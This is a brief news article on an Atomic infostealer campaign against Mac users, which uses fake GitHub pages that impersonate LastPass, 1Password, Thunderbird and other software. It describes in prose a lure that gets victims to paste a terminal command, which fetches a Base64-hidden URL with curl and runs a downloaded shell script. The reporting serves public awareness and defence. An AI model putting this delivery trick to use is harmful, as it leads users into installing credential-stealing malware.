Mac users are being targeted by unknown threat actors offering malicious versions of well-known software, including LastPass, 1Password, and Thunderbird, via the developer platform GitHub.
According to the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, threat actors have launched a widespread infostealer campaign targeting Mac users through fraudulent GitHub repositories.
The campaign is designed to trick victims into installing what is presented as various companies’ software for macOS.
The threat actors have been impersonating a wide range of companies, including tech companies, financial institutions, and password managers. Indicators of Compromise (IoC) show that, among others, LastPass, 1Password, Audacity, Robin Hood, Shopify, SurferSEO, Thunderbird, and Tweetdeck are being misused to deliver Atomic infostealer malware.
Threat actors use Search Engine Optimization (SEO) to ensure their malicious sites appear at the top of Bing and Google’s search engine result pages (SERPs).
For example, when users search for macOS, LastPass, and GitHub, the malicious GitHub page appears at the top of the search results. The GitHub page contains text and logos from the official software to appear trustworthy.
The site then redirects users to a malicious page, instructing them to copy-paste a command line into their Mac’s terminal. The command conducts a CURL request, which is used to download data from the internet. The URL is Base64 encoded, meaning that it isn’t written in plaintext but hidden with a scrambled-looking string to be less obvious to anyone inspecting the code.
Lastly, a shell script is downloaded, containing instructions for the operating system to execute. In this case, it downloads a payload called Atomic infostealer malware.
“We are writing this blog post to raise awareness of the campaign and protect our customers while we continue to actively pursue takedown and disruption efforts, and to also share indicators of compromise (IoCs) to help other security teams detect cyber threats. We are actively monitoring this campaign and will update our blog post with any new information,” LastPass’s TIME team explains in a detailed blog post.
Your email address will not be published. Required fields are markedmarked